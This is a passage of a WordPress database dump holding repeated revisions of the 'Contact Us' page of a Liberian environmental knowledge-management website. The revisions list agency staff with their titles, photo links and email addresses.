</strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-22 10:31:13','2021-01-22 10:31:13','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3398,42,'2021-01-22 10:32:57','2021-01-22 10:32:57','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><strong>John K. Jallah</strong>\n<p>Manager, ESIA </br>\nDepartment of Compliance and Enforcement </br>\nEPA<p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Konikay Nimely</strong>\n<p>EIA Manager </br>FDA </br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong>\n<p>Marketing and Forest Forecast \n</br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong></p><p>Director, MOA</p><p><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager, LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-22 10:32:57','2021-01-22 10:32:57','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3399,42,'2021-01-22 10:32:57','2021-01-22 10:32:57','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><strong>John K. Jallah</strong>\n<p>Manager, ESIA </br>\nDepartment of Compliance and Enforcement </br>\nEPA<p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Konikay Nimely</strong>\n<p>EIA Manager </br>FDA </br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong>\n<p>Marketing and Forest Forecast \n</br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong></p><p>Director, MOA</p><p><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager, LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-22 10:32:57','2021-01-22 10:32:57','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3400,42,'2021-01-22 10:32:57','2021-01-22 10:32:57','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><strong>John K. Jallah</strong>\n<p>Manager, ESIA </br>\nDepartment of Compliance and Enforcement </br>\nEPA<p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Konikay Nimely</strong>\n<p>EIA Manager </br>FDA </br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong>\n<p>Marketing and Forest Forecast \n</br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong>\n<p>Conservation Manager </br> FDA </br>\n<a href=\"mailto:blamahg@gmail.com\">blamag@gmail.com</a> </br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong></p><p>Director, MOA</p><p><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager, LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer 